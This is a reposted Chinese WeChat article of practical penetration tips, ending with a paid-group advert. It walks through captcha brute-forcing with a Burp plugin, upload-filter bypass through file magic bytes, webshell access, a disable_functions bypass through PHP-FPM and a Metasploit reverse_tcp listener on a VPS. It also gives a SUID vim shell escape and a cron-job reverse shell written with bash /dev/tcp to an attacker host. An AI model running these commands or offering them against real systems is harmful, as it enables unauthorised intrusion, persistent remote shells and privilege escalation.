实战技巧分享
2024-4-27 21:49:34 Author: mp.weixin.qq.com(查看原文) 阅读量:19 收藏

1、后台验证码爆破

可以看到是有验证码的,也不存在验证码无限爆破漏洞只能使用burp插件验证码识别

1、首先是下载插件

captcha-killer-modified

2、获取验证码

获取一下,看看有没有获取上

3、开启python脚本

4、配置爆破

2、getshell 几种方式

1、用无影响的

直接访问上传的webshell

bypass disable_function

返回ret=127代表函数禁用需要bypasshttps://www.anquanke.com/post/id/208451

案例解析

文件上传点开启我们的 Burp, 进行拦截发包, 经过测试发现只能上传 .jpg 文件, 此时我们需要绕过后端过滤, 经过查询后发现修改文件幻数就可以绕过检测

我们来访问我们的文件可以发现获取到 SHELL 但是马上关闭, 我们查看房间, 了解到需要做一些规避

首先根据提示内容, 我们需要先找到对应服务器的路径, 在目录遍历时, 我们发现了一个 phpinfo() 在此我们可以找到对于服务器路径

思路打开

既然上传文件后无法长时间存活,那么就可以反弹shell,或者在能执行命令的这段时间反弹shell到msf上

就比如蚁剑我使用插件bypass后,虽然能执行命令,但不到一分钟就又不能执行了,这个时候我的想法就是把shell反弹到msf上,顺便还能跑一下自带的提权

运维人员会禁用 PHP 的一些 “危险” 函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。

这函数禁用的真死,用php木马反弹shell肯定是不行了

proc _ open ()已被禁用

只能上传msf木马反弹监听了在VPN上直接安装msf,省的搭建代理了而且是低权限只能先msf,再提权了

php-fpm是PHP内置的一种fast-cgi

php-fpm即php-Fastcgi Process Manager.php-fpm是 FastCGI 的实现,并提供了进程管理的功能。进程包含 master 进程和 worker 进程两种进程。master 进程只有一个,负责监听端口,接收来自 Web Server 的请求,而 worker 进程则一般有多个(具体数量根据实际需要配置),每个进程内部都嵌入了一个 PHP 解释器,是 PHP 代码真正执行的地方。

看到这里可以看到PHP-FPM找到tmp目录下的进行绕过.antproxy.php

/tmp/php-cgi-54.sock

有时候没成功,可能是php路径有问题通常在

`/usr/local/bin/php` 或 `/usr/bin/php`

vps搭建msf

安装msf

curl [https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb](https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb) > msfinstall && chmod 755 msfinstall && ./msfinstall

2.安装postgresql供msf使用

sudo apt install postgresql

3.测试查看数据库状态

systemctl status postgresql

设置数据开机自启动systemctl enable postgresql启动msfmsfconsole

设置监听器

msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost VPS-IPexploit or run

成功获取

suid 提权

查找拥有 suid 权限的文件

find / -perm /4000 2>/dev/null

vim 命令提权

https://gtfobins.github.io/gtfobins/vim/#suid

/usr/bin/vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

没有成功

旁门左道提权

计划任务提权查找 777 权限文件

find / -perm 777 -type f

写入反弹 shell ip 端口自行修改

echo "bash -i >& /dev/tcp/you-vps/10086 0>&1" >> /tmp/hackme.sh


如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放

往期回顾

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247494414&idx=1&sn=e69192f29a8573a79f026e6982b32736&chksm=e8a5e16ddfd2687bea3128e4ce6d4509dc81b9269297aa2163ff85bb448d9b0e703a59c7737d&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh